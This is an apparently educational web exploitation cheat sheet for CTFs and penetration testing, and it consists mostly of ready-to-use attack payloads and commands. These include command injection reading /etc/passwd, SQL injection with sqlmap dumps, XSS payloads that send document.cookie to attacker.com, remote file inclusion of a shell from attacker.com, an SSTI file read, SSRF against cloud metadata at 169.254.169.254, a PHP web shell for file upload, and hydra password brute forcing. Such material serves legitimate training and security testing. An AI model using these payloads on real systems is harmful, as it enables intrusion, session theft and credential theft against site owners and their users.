4 CTFs

Web Exploitation for CTFs — The Hacker’s Web Arsenal

Web exploitation is the core discipline of most CTF challenges — it’s where logic, code, and creativity collide. This handbook transforms your understanding of web vulnerabilities into tactical precision, equipping you with exploitation techniques, payloads, and real-world methodology for CTFs and penetration testing.

I. 🌐 Core Concepts

II. 🧩 Enumeration & Reconnaissance

1️⃣ Directory Brute-Forcing

ffuf -u http://target/FUZZ -w /usr/share/wordlists/dirb/common.txt -t 50

or:

gobuster dir -u http://target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

2️⃣ Parameter Discovery

ffuf -u http://target/index.php?FUZZ=test -w params.txt

3️⃣ Hidden File Discovery

curl -s http://target/.git/config
curl -s http://target/.env

4️⃣ Tech Stack Fingerprinting

whatweb http://target
wappalyzer http://target

III. 💣 Common Vulnerability Classes

🧬 1. Command Injection

Occurs when user input is passed to a system command.

🔍 Test

; id
&& whoami
| cat /etc/passwd

💥 Exploit

curl "http://target/vuln.php?cmd=whoami"

🧠 Bypass Examples

• Encoded: %26%26whoami

• Chained: || sleep 5

• Obfuscated: $(id)

🧩 2. Local File Inclusion (LFI)

When input allows inclusion of local files.

🔍 Test

page=../../../../etc/passwd

💥 Exploit

curl "http://target/index.php?page=../../../../etc/passwd"

🧠 Advanced Tricks

• Null byte: ../../../../etc/passwd%00

• Log poisoning:

  Copy

  /var/log/apache2/access.log

  Inject PHP code via User-Agent header and include the log file.

🔓 3. Remote File Inclusion (RFI)

page=http://attacker.com/shell.txt

Attacker hosts a reverse shell, included and executed remotely.

💀 4. SQL Injection (SQLi)

🔍 Basic Payloads

' OR 1=1--
' UNION SELECT 1,2,3--

🧰 Exploitation Tools

sqlmap -u "http://target/login.php?id=1" --dump

🧠 Advanced Tricks

• Bypass filters with comments:

  Copy

  admin'/**/OR/**/1=1--

• Blind SQLi:

  Copy

  1' AND sleep(5)--+

🧩 Manual Blind Testing

time curl "http://target/item?id=1' AND sleep(5)--"

🧬 5. Cross-Site Scripting (XSS)

🔍 Reflected XSS

<script>alert(1)</script>

💥 Persistent XSS

Inject into comment fields, profiles, or stored data.

🧠 Payload Variations

"><svg/onload=alert(1)>
<img src=x onerror=alert(1)>
<script>fetch('http://attacker.com/'+document.cookie)</script>

🚀 Stealth Payloads

<iframe src=javascript:alert(1)>
"><svg/onload=fetch('//attacker/xss?c='+document.cookie)>

🧩 6. Cross-Site Request Forgery (CSRF)

Force user to execute unintended requests.

💣 Example:

<form action="http://target/delete.php" method="POST">
  <input type="hidden" name="user" value="admin">
  <input type="submit">
</form>
<script>document.forms[0].submit()</script>

🧩 7. Server-Side Template Injection (SSTI)

🔍 Detect

Try {{7*7}} or ${7*7}

💥 Exploit

{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}

Common Frameworks

🧩 8. Server-Side Request Forgery (SSRF)

🔍 Test

curl "http://target/fetch?url=http://127.0.0.1:22"

🧠 Exploit

Use SSRF to pivot into internal networks:

curl "http://target/fetch?url=http://169.254.169.254/latest/meta-data/"

🚀 Advanced

Bypass blacklist filters:

127.1
localhost
0x7f000001

💾 9. File Upload Vulnerabilities

🔍 Test Upload

Try uploading .php, .phtml, .jpg.php.

💥 Exploit Example

<?php system($_GET['cmd']); ?>

Upload, then access:

http://target/uploads/shell.php?cmd=id

🧠 Bypasses

• Double extensions: file.jpg.php

• MIME spoofing: Content-Type: image/jpeg

• Null-byte truncation: file.php%00.jpg

🧠 10. Authentication & Session Issues

Brute Force

hydra -l admin -P rockyou.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"

Session Prediction

Check for sequential cookies or JWT tampering:

import jwt
print(jwt.decode(token, options={"verify_signature": False}))

IV. 🧠 Exploitation Workflow Example

# Step 1: Recon
whatweb target.com
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# Step 2: Identify Input Points
wfuzz -u http://target.com/page.php?FUZZ=value -w params.txt

# Step 3: Test for Injection
curl "http://target.com/page.php?id=1'--+"

# Step 4: Exploit
sqlmap -u "http://target.com/page.php?id=1" --dump

# Step 5: Post-Exploitation
curl "http://target.com/shell.php?cmd=whoami"

V. 🧩 Useful Tools

VI. 🧠 Pro Tips & Red Team Tricks

✅ Methodology

1. Enumerate endpoints → Identify parameters

2. Check for input reflections and responses

3. Automate with tools, validate manually

4. Use Burp Intruder for precision fuzzing

✅ XSS Hunting

• Use <img src=x onerror=alert(1)> instead of <script>.

• Look for input in HTML attributes, JavaScript, and URLs.

✅ SQLi Optimization

• Always test sleep(5) to detect blind SQLi.

• Dump tables manually if sqlmap fails.

✅ LFI / RFI

• Chain LFI → RCE using log poisoning or /proc/self/environ.

✅ SSRF

• Target cloud metadata (169.254.169.254) or internal admin panels.

✅ Automation Tip Use your own one-liners:

for url in $(cat urls.txt); do
    curl -s $url | grep -i "error\|warning\|syntax"; 
done

VII. ⚔️ Bonus: Universal Web Exploitation Template

#!/bin/bash
# Web Exploitation Template - CTF Automation
target=$1
echo "[+] Scanning: $target"

# Directory brute force
ffuf -u http://$target/FUZZ -w /usr/share/wordlists/dirb/common.txt -t 50

# Parameter discovery
ffuf -u http://$target/index.php?FUZZ=test -w /usr/share/wordlists/params.txt

# SQLi test
curl -s "http://$target/page.php?id=1'" | grep "SQL"

# XSS test
curl -s "http://$target/search?q=<script>alert(1)</script>"